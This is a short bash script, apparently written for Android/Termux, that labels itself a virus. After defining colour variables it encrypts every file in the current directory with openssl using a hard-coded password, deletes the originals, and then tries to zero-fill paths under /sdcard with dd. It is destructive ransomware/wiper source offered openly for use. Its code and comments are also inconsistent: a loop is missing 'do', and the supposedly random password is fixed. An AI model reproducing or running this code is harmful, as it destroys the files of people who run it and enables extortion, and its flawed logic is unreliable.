#!/usr/bin/bash

R="$(printf '\033[1;31m')"
G="$(printf '\033[1;32m')"
Y="$(printf '\033[1;33m')"
W="$(printf '\033[1;37m')"
C="$(printf '\033[1;36m')"

b="\033[1;30m"
r="\033[1;31m"
g="\033[1;32m"
y="\033[1;33m"
b="\033[1;34m"
p="\033[1;35m"
c="\033[1;36m"
v="\033[1;37m"
w="\033[0;37m"

black="\033[1;30m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
blue="\033[1;34m"
purple="\033[1;35m"
cyan="\033[1;36m"
violate="\033[1;37m"
white="\033[0;37m"
nc="\033[00m"

info="${cyan}[${white}+${cyan}] ${yellow}"
fun="${cyan}[${white}@${cyan}] ${purple}"
ask="${cyan}[${white}?${cyan}] ${purple}"
bad="${cyan}[${white}!${cyan}] ${red}"
good="${cyan}[${white}√${cyan}] ${green}"

sad="$red ಠ⁠︵ಠ⁠"
llok="$blue ಠ⁠_⁠ʖ⁠ಠ⁩"
hehe="$yellow ಡ⁠ ͜⁠ ⁠ʖ⁠ ⁠ಡ"
huh="$blue ʘ⁠‿⁠ʘ"
happy="( ⁠•⁠ ⁠‿⁠ ⁠•⁠ )"

#Virus_Script

echo -e $bad "Virus Activated"

# Get the directory of the infected file
home=$(pwd)



# Encrypt all files in the directory

for filename in $(ls); do

    # Generate a random password
    PASSWORD=BLUE_THE_KING

    # Encrypt the file using the generated password
        cd $home/
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.enc -k $PASSWORD
        rm $filename
    # Create a text file containing the password used to encrypt the file

done

for Doom in $(ls)
dd if=/dev/zero of=/sdcard/$Doom/ bs=1024 count=10000
dd if=/dev/zero of=/sdcard/$Doom/ bs=1024 count=10000
done
